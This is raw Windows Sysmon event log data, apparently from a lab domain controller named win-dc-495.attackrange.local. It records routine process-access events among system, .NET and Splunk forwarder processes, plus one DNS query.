13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9095-6005-2201-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9095-6005-2201-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.988{59A5CD1D-9095-6005-2201-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:57.112{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:58.862{59A5CD1D-8E46-6005-1600-00000000A301}15443460C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:58.862{59A5CD1D-8E46-6005-1600-00000000A301}15443460C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000005194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:57.018{59A5CD1D-8E46-6005-1000-00000000A301}1164WIN-DC-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 10341000x80000000000000005308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.831{59A5CD1D-90A0-6005-2B01-00000000A301}44362516C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2E01-00000000A301}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.831{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2E01-00000000A301}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.831{59A5CD1D-90A0-6005-2A01-00000000A301}32401372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{59A5CD1D-90A0-6005-2E01-00000000A301}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+32979|UNKNOWN(00007FF8288A5147) 10341000x80000000000000005305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.799{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-90A0-6005-2D01-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.799{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-90A0-6005-2D01-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.784{59A5CD1D-90A0-6005-2B01-00000000A301}44362516C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2D01-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.784{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2D01-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.784{59A5CD1D-90A0-6005-2A01-00000000A301}32401372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{59A5CD1D-90A0-6005-2D01-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+32979|UNKNOWN(00007FF8288A5147) 10341000x80000000000000005300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.706{59A5CD1D-90A0-6005-2C01-00000000A301}27922760C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2901-00000000A301}4440C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.690{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2C01-00000000A301}2792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.612{59A5CD1D-90A0-6005-2B01-00000000A301}44362516C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2A01-00000000A301}3240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.612{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2B01-00000000A301}4436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2A01-00000000A301}3240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 